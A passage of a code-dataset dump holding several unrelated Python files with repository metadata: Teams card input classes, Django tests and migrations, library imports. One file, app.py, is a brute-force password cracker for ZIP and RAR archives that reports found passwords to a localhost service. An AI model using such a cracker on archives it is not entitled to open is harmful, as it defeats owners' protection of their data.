] | 1 | 2020-04-02T17:01:41.000Z | 2020-04-02T17:01:41.000Z | multifil/aws/__init__.py | travistune3/multifil | 6e2a5d68dbdd7c7b5b6e50bdba92e6f7de3331fb | [
"MIT"
] | null | null | null | multifil/aws/__init__.py | travistune3/multifil | 6e2a5d68dbdd7c7b5b6e50bdba92e6f7de3331fb | [
"MIT"
] | 2 | 2020-03-19T23:45:25.000Z | 2021-04-05T17:20:18.000Z | from multifil.aws.run import manage
from multifil.aws.metas import emit
from multifil.utilities import use_aws
if use_aws:
from .instance import queue_eater
from .cluster import watch_cluster
| 25.125 | 38 | 0.80597 | 31 | 201 | 5.096774 | 0.516129 | 0.227848 | 0.189873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154229 | 201 | 7 | 39 | 28.714286 | 0.929412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5c17a3e8245b6ed20f17a4cd87b77cdb4d845703 | 4,942 | py | Python | msteamswebhook/inputs.py | mviniciusleal/msteamswebhook | dfcd1407e296fc5e7ca423853053f679cf625cda | [
"MIT"
] | null | null | null | msteamswebhook/inputs.py | mviniciusleal/msteamswebhook | dfcd1407e296fc5e7ca423853053f679cf625cda | [
"MIT"
] | null | null | null | msteamswebhook/inputs.py | mviniciusleal/msteamswebhook | dfcd1407e296fc5e7ca423853053f679cf625cda | [
"MIT"
] | null | null | null | from msteamswebhook.base import *
from typing import Union, List, Dict
class Input_ChoiceSet(Input):
_type = "Input.ChoiceSet"
def __init__(self,
id: str,
choices: List[Input_Choice],
isMultiSelect: bool=None,
style: ChoiceInputStyle=None,
value: str=None,
placeholder: str=None,
wrap: bool=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._choices = choices
self._isMultiSelect = isMultiSelect
self._style = style
self._value = value
self._placeholder = placeholder
self._wrap = wrap
class Input_Date(Input):
_type = "Input.Date"
def __init__(self,
id: str,
max: str=None,
min: str=None,
placeholder: str=None,
value: str=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._max = max
self._min = min
self._placeholder = placeholder
self._value = value
class Input_Number(Input):
_type = "Input.Number"
def __init__(self,
id: str,
max: int=None,
min: int=None,
placeholder: str=None,
value: int=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._max = max
self._min = min
self._placeholder = placeholder
self._value = value
class Input_Text(Input):
_type = "Input.Text"
def __init__(self,
id: str,
isMultiline: bool=None,
maxLength: int=None,
placeholder: str=None,
regex: str=None,
style: TextInputStyle=None,
inlineAction: SelectAction=None,
value: str=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._isMultiline = isMultiline
self._maxLength = maxLength
self._placeholder = placeholder
self._regex = regex
self._style = style
self._inlineAction = inlineAction
self._value = value
class Input_Time(Input):
_type = "Input.Time"
def __init__(self,
id: str,
max: str=None,
min: str=None,
placeholder: str=None,
value: str=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._max = max
self._min = min
self._placeholder = placeholder
self._value = value
class Input_Toggle(Input):
_type = "Input.Toggle"
def __init__(self,
id: str,
title: str,
value: str=None,
valueOff: str=None,
valueOn: str=None,
wrap: bool=None,
#Input
errorMessage: str=None,
isRequired: bool=None,
label: str=None,
fallback: Union[IElement, FallbackOption]=None,
height: BlockElementHeight=None,
separator: bool=None,
spacing: Spacing=None,
isVisible: bool=None,
additionalProperties: Dict=None
):
super().__init__(id, errorMessage, isRequired, label, fallback, height, separator, spacing, isVisible, additionalProperties)
self._title = title
self._value = value
self._valueOff = valueOff
self._valueOn = valueOn
self._wrap = wrap
| 28.900585 | 132 | 0.648928 | 514 | 4,942 | 6.062257 | 0.110895 | 0.065148 | 0.026958 | 0.025032 | 0.758665 | 0.712131 | 0.706033 | 0.706033 | 0.706033 | 0.706033 | 0 | 0 | 0.250708 | 4,942 | 170 | 133 | 29.070588 | 0.84148 | 0.007082 | 0 | 0.756579 | 0 | 0 | 0.014082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.013158 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5c1dd0fa3d116b6293aedfa20eacc198cb70f438 | 130 | py | Python | pyfileconf/exceptions/config.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 2 | 2020-11-29T19:09:14.000Z | 2021-09-11T19:21:21.000Z | pyfileconf/exceptions/config.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 47 | 2020-02-01T03:54:07.000Z | 2022-01-13T02:24:45.000Z | pyfileconf/exceptions/config.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | null | null | null |
class ConfigManagerNotLoadedException(Exception):
pass
class CannotResolveConfigDependenciesException(Exception):
pass
| 16.25 | 58 | 0.823077 | 8 | 130 | 13.375 | 0.625 | 0.242991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130769 | 130 | 7 | 59 | 18.571429 | 0.946903 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
5c2b789751c6586c849663183fd84073f92cbc40 | 2,840 | py | Python | emorobot/monitor/tests/test_grouping_tests.py | cudaczek/emorobot-django | 7637d6702df2a4ca41b6e4d51e727f910dcf9050 | [
"MIT"
] | null | null | null | emorobot/monitor/tests/test_grouping_tests.py | cudaczek/emorobot-django | 7637d6702df2a4ca41b6e4d51e727f910dcf9050 | [
"MIT"
] | 4 | 2020-01-28T23:10:41.000Z | 2022-02-10T00:37:39.000Z | emorobot/monitor/tests/test_grouping_tests.py | cudaczek/emorobot-django | 7637d6702df2a4ca41b6e4d51e727f910dcf9050 | [
"MIT"
] | null | null | null | from unittest import TestCase
from django.apps import apps
AUDIO_CLASSIFIER = apps.get_app_config('monitor').audio_classifier
VIDEO_CLASSIFIER = apps.get_app_config('monitor').video_classifier
# using own emotions groups
class VideoGroupTestCase(TestCase):
def test_group_classical(self):
results = [0.11, 0.44, 0.45]
labels = ["sad", "happy", "angry"]
values, category_names = VIDEO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.11 + 0.45, "positive": 0.44, "other": 0.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_no_existing_emotion(self):
results = [0.11, 0.44, 0.45]
labels = ["excited", "happy", "angry"]
values, category_names = VIDEO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.45, "positive": 0.44, "other": 0.11, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_no_existing_emotion_in_own_dict_but_in_global(self):
results = [0.11, 0.44, 0.45]
labels = ["male_sad", "female_happy", "male_angry"]
values, category_names = VIDEO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.0, "positive": 0.0, "other": 1.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
# using global emotional dictionary
class AudioGroupTestCase(TestCase):
def test_group_classical(self):
results = [0.11, 0.44, 0.45]
labels = ["sad", "happy", "angry"]
values, category_names = AUDIO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.45 + 0.11, "positive": 0.44, "other": 0.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_one_no_existing_emotion(self):
results = [0.11, 0.44, 0.45]
labels = ["excited", "male_happy", "female_angry"]
values, category_names = AUDIO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.45, "positive": 0.44, "other": 0.11, "neutral": 0.0}
self.assertDictEqual(categories, result)
def test_group_all_no_existing_emotions_in_global_dict(self):
results = [0.11, 0.44, 0.45]
labels = ["excited", "scared", "tired"]
values, category_names = AUDIO_CLASSIFIER.group(results, labels)
categories = {x[1]: x[0] for x in zip(values, category_names)}
result = {"negative": 0.0, "positive": 0.0, "other": 1.0, "neutral": 0.0}
self.assertDictEqual(categories, result)
| 47.333333 | 90 | 0.648592 | 387 | 2,840 | 4.599483 | 0.165375 | 0.094382 | 0.12809 | 0.047191 | 0.833146 | 0.833146 | 0.796067 | 0.794382 | 0.794382 | 0.779775 | 0 | 0.057548 | 0.204577 | 2,840 | 59 | 91 | 48.135593 | 0.730412 | 0.020775 | 0 | 0.666667 | 0 | 0 | 0.108711 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.041667 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
30f6e1d7cf19b0fc37d90373fc5970feb66ccd87 | 355 | py | Python | rlcard/games/wizard_trickpreds/__init__.py | MagnusWagner/rlcard | 1a3aaef76e78968ebc68eb5b92e57be4709f7e38 | [
"MIT"
] | null | null | null | rlcard/games/wizard_trickpreds/__init__.py | MagnusWagner/rlcard | 1a3aaef76e78968ebc68eb5b92e57be4709f7e38 | [
"MIT"
] | null | null | null | rlcard/games/wizard_trickpreds/__init__.py | MagnusWagner/rlcard | 1a3aaef76e78968ebc68eb5b92e57be4709f7e38 | [
"MIT"
] | null | null | null | from rlcard.games.wizard_trickpreds.dealer import WizardDealer as Dealer
from rlcard.games.wizard_trickpreds.judger import WizardJudger as Judger
from rlcard.games.wizard_trickpreds.player import WizardPlayer as Player
from rlcard.games.wizard_trickpreds.card import WizardCard as Card
from rlcard.games.wizard_trickpreds.game import WizardGame as Game
| 44.375 | 72 | 0.867606 | 50 | 355 | 6.06 | 0.34 | 0.165017 | 0.247525 | 0.346535 | 0.511551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090141 | 355 | 7 | 73 | 50.714286 | 0.938081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
eb79f54201bb85afed3ab6e85715f334739a21cd | 3,225 | py | Python | app.py | erfansaberi/CFC_Compressed_files_cracker | f07ef9f80c0f86034665afdd32cc25a4688f8789 | [
"MIT"
] | 1 | 2020-10-23T10:52:55.000Z | 2020-10-23T10:52:55.000Z | app.py | erfansaberi/CFC-Compressed-files-cracker | f07ef9f80c0f86034665afdd32cc25a4688f8789 | [
"MIT"
] | null | null | null | app.py | erfansaberi/CFC-Compressed-files-cracker | f07ef9f80c0f86034665afdd32cc25a4688f8789 | [
"MIT"
] | null | null | null | from zipfile import ZipFile
from rarfile import RarFile
import os
import sys
import requests
numpasswords = 0
def crackzip(filepath,passwd):
i = 0
with ZipFile(filepath, 'r') as zipObj:
for password in passwd:
i += 1
try:
zipObj.extractall(path='./extractedfile', members=None, pwd=password.rstrip('\n').encode())
print('\n===================')
print('zip file extracted!')
print('===================\n')
requests.get(f'http://localhost:5000/recieve?status=extracted&password={password}&processid={processid}')
return ''
except:
pass
try:
if i%20 == 0:
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
except Exception as e:
requests.get(f'http://localhost:5000/errors?error={e}')
requests.get('http://localhost:5000/recieve?status=failed')
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
def crackrar(filepath,passwd):
i = 0
with RarFile(filepath,'r') as rarObj:
for password in passwd:
i += 1
try:
rarObj.extractall(path='./extractedfile', members=None, pwd=password.rstrip('\n'))
print('\n===================')
print('rar file extracted!')
print('===================\n')
requests.get(f'http://localhost:5000/recieve?status=extracted&password={password}&processid={processid}')
return ''
except:
pass
try:
if i%20 == 0:
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
except Exception as e:
requests.get(f'http://localhost:5000/errors?error={e}')
requests.get('http://localhost:5000/recieve?status=failed')
requests.get(f'http://localhost:5000/progress?processid={processid}&numpasswords={numpasswords}&testedpasswords={i}')
def getnumpasswords(passpath):
num = 0
with open(passpath,'r') as passlist:
for line in passlist:
num += 1
return num
try:
zippath = sys.argv[2]
passpath = sys.argv[1]
processid = sys.argv[3]
if os.path.splitext(zippath)[1] == '.zip':
numpasswords = getnumpasswords(passpath)
requests.get(f'http://localhost:5000/start?processid={processid}&numpasswords={numpasswords}')
passwd = open(passpath)
crackzip(zippath,passwd)
passwd.close()
elif os.path.splitext(zippath)[1] == '.rar':
numpasswords = getnumpasswords(passpath)
requests.get(f'http://localhost:5000/start?processid={processid}&numpasswords={numpasswords}')
passwd = open(passpath)
crackrar(zippath,passwd)
passwd.close()
except Exception as e:
requests.get(f'http://localhost:5000/errors?error={e}') | 41.346154 | 138 | 0.568372 | 330 | 3,225 | 5.554545 | 0.221212 | 0.078014 | 0.120567 | 0.096017 | 0.77305 | 0.727223 | 0.727223 | 0.701037 | 0.701037 | 0.639935 | 0 | 0.030017 | 0.276899 | 3,225 | 78 | 139 | 41.346154 | 0.756003 | 0 | 0 | 0.625 | 0 | 0 | 0.348365 | 0.026675 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0.402778 | 0.069444 | 0 | 0.152778 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
eb8d26ed65479479d5bce9dba2d8faa1aec5c8c2 | 137 | py | Python | learn-py/listas-py/a12.py | cassiocamargos/Python | 14caf13145ee9c6807d572aac0af7497b00767e8 | [
"MIT"
] | null | null | null | learn-py/listas-py/a12.py | cassiocamargos/Python | 14caf13145ee9c6807d572aac0af7497b00767e8 | [
"MIT"
] | null | null | null | learn-py/listas-py/a12.py | cassiocamargos/Python | 14caf13145ee9c6807d572aac0af7497b00767e8 | [
"MIT"
] | null | null | null | # 12- Faça um programa para calcular o estoque médio de uma peça, sendo que: ESTOQUE MÉDIO = (QUANTIDADE_MÍNIMA + QUANTIDADE_MÁXIMA) / 2. | 137 | 137 | 0.766423 | 21 | 137 | 4.904762 | 0.857143 | 0.23301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026087 | 0.160584 | 137 | 1 | 137 | 137 | 0.869565 | 0.985401 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cced38e106e82759e27c6295d2876d1b63875dad | 34 | py | Python | models/ops/depthconv/functions/__init__.py | E18301194/DepthAwareCNN | 8ae98f7f18b69f79e7df03397dec2543d3d0c8eb | [
"MIT"
] | 278 | 2018-05-09T03:08:56.000Z | 2022-03-10T08:05:10.000Z | models/ops/depthconv/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 35 | 2018-05-31T15:42:44.000Z | 2022-03-17T09:36:13.000Z | models/ops/depthconv/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 80 | 2018-06-03T10:04:48.000Z | 2022-03-05T12:57:31.000Z | from .depthconv import depth_conv
| 17 | 33 | 0.852941 | 5 | 34 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6905bbadb5b1f1db3200d748c41164c657cc5724 | 94 | py | Python | torchFI/__init__.py | bfgoldstein/tiny_torchfi | 82b0f4931ff8aac6079122200fbe61782bb1f0da | [
"Apache-2.0"
] | null | null | null | torchFI/__init__.py | bfgoldstein/tiny_torchfi | 82b0f4931ff8aac6079122200fbe61782bb1f0da | [
"Apache-2.0"
] | null | null | null | torchFI/__init__.py | bfgoldstein/tiny_torchfi | 82b0f4931ff8aac6079122200fbe61782bb1f0da | [
"Apache-2.0"
] | 1 | 2021-05-17T00:48:03.000Z | 2021-05-17T00:48:03.000Z | from .modules import *
from .bitflip import *
from .injection import *
from .fi_train import * | 23.5 | 24 | 0.755319 | 13 | 94 | 5.384615 | 0.538462 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159574 | 94 | 4 | 25 | 23.5 | 0.886076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6927717cf5be474676ee5c6dd6c85608b5861f6c | 53 | py | Python | python/src/main/python/pyalink/alink/common/types/catalog/__init__.py | wenwei8268/Alink | c00702538c95a32403985ebd344eb6aeb81749a7 | [
"Apache-2.0"
] | null | null | null | python/src/main/python/pyalink/alink/common/types/catalog/__init__.py | wenwei8268/Alink | c00702538c95a32403985ebd344eb6aeb81749a7 | [
"Apache-2.0"
] | null | null | null | python/src/main/python/pyalink/alink/common/types/catalog/__init__.py | wenwei8268/Alink | c00702538c95a32403985ebd344eb6aeb81749a7 | [
"Apache-2.0"
] | null | null | null | from .catalog import *
from .catalog_object import *
| 17.666667 | 29 | 0.773585 | 7 | 53 | 5.714286 | 0.571429 | 0.55 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 53 | 2 | 30 | 26.5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
695135b91e9e98f31ed88c8722447e9b598e3e85 | 41 | py | Python | whitehole/__init__.py | heligp/whitehole | 1e64e07e07416dbecac7326604afc653302d7044 | [
"MIT"
] | 2 | 2021-02-10T06:13:53.000Z | 2022-02-10T21:53:50.000Z | whitehole/__init__.py | heligp/whitehole | 1e64e07e07416dbecac7326604afc653302d7044 | [
"MIT"
] | null | null | null | whitehole/__init__.py | heligp/whitehole | 1e64e07e07416dbecac7326604afc653302d7044 | [
"MIT"
] | 1 | 2020-11-22T21:24:59.000Z | 2020-11-22T21:24:59.000Z | from whitehole.decryptor import Decryptor | 41 | 41 | 0.902439 | 5 | 41 | 7.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 41 | 1 | 41 | 41 | 0.973684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6970c5544f187c68f2678ee7d60b746deba4bbba | 56 | py | Python | pyecho/__init__.py | itsnauman/echo | 367db9764000a1518e835dbdacaf177892b50594 | [
"MIT"
] | 8 | 2015-04-20T16:47:39.000Z | 2021-01-14T04:07:11.000Z | pyecho/__init__.py | itsnauman/echo | 367db9764000a1518e835dbdacaf177892b50594 | [
"MIT"
] | null | null | null | pyecho/__init__.py | itsnauman/echo | 367db9764000a1518e835dbdacaf177892b50594 | [
"MIT"
] | 1 | 2015-04-21T11:52:29.000Z | 2015-04-21T11:52:29.000Z | from .echo import echo
from .echo import FailingTooHard
| 18.666667 | 32 | 0.821429 | 8 | 56 | 5.75 | 0.5 | 0.347826 | 0.608696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 56 | 2 | 33 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
15c3488c3a54bc843858a2efca16451e4c18dac5 | 80 | py | Python | DaVinciAccess/__init__.py | andostini/DailiesPipe | 06dedfa30b7d12ff795a9267d13b2f5c6106c986 | [
"MIT"
] | 1 | 2021-12-08T09:16:27.000Z | 2021-12-08T09:16:27.000Z | DaVinciAccess/__init__.py | andostini/SilverstackAccess | 06dedfa30b7d12ff795a9267d13b2f5c6106c986 | [
"MIT"
] | 1 | 2021-08-10T13:24:41.000Z | 2021-08-10T13:24:41.000Z | DaVinciAccess/__init__.py | andostini/DailiesPipe | 06dedfa30b7d12ff795a9267d13b2f5c6106c986 | [
"MIT"
] | 1 | 2021-01-29T15:23:27.000Z | 2021-01-29T15:23:27.000Z | from DaVinciAccess.DaVinciAccess import Project, getProjects, getSubfolderByName | 80 | 80 | 0.9 | 7 | 80 | 10.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 80 | 1 | 80 | 80 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c62f171a532186cdbdaa09e7f725a456aec5331b | 2,601 | py | Python | exams/migrations/0027_auto_20210806_0955.py | ankanb240/otis-web | 45eda65b419705c65c02b15872a137969d53d8e9 | [
"MIT"
] | 15 | 2021-08-28T18:18:37.000Z | 2022-03-13T07:48:15.000Z | exams/migrations/0027_auto_20210806_0955.py | ankanb240/otis-web | 45eda65b419705c65c02b15872a137969d53d8e9 | [
"MIT"
] | 65 | 2021-08-20T02:37:27.000Z | 2022-02-07T17:19:23.000Z | exams/migrations/0027_auto_20210806_0955.py | ankanb240/otis-web | 45eda65b419705c65c02b15872a137969d53d8e9 | [
"MIT"
] | 31 | 2020-01-09T02:35:29.000Z | 2022-03-13T07:48:18.000Z | # Generated by Django 3.2.5 on 2021-08-06 13:55
from django.db import migrations, models
import exams.models
class Migration(migrations.Migration):
dependencies = [
('exams', '0026_auto_20210806_0126'),
]
operations = [
migrations.AlterField(
model_name='examattempt',
name='guess1',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 1 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess2',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 2 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess3',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 3 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess4',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 4 response'),
),
migrations.AlterField(
model_name='examattempt',
name='guess5',
field=models.CharField(blank=True, max_length=18, validators=[exams.models.expr_validator], verbose_name='Problem 5 response'),
),
migrations.AlterField(
model_name='practiceexam',
name='answer1',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer2',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer3',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer4',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
migrations.AlterField(
model_name='practiceexam',
name='answer5',
field=models.CharField(blank=True, max_length=64, validators=[exams.models.expr_validator_multiple]),
),
]
| 40.015385 | 139 | 0.627835 | 262 | 2,601 | 6.068702 | 0.221374 | 0.076101 | 0.157233 | 0.18239 | 0.852201 | 0.84717 | 0.791195 | 0.660377 | 0.660377 | 0.660377 | 0 | 0.034021 | 0.254133 | 2,601 | 64 | 140 | 40.640625 | 0.785567 | 0.017301 | 0 | 0.603448 | 1 | 0 | 0.11668 | 0.009005 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.086207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d667ef990de1ca58ac5bf4fd84e847aa4f4f5031 | 130 | py | Python | jobs/blast/query2tree.py | OSC/pseudofun | fce05e37dcba713d2c3f622b295350cfdd46b9e1 | [
"CC-BY-4.0",
"MIT"
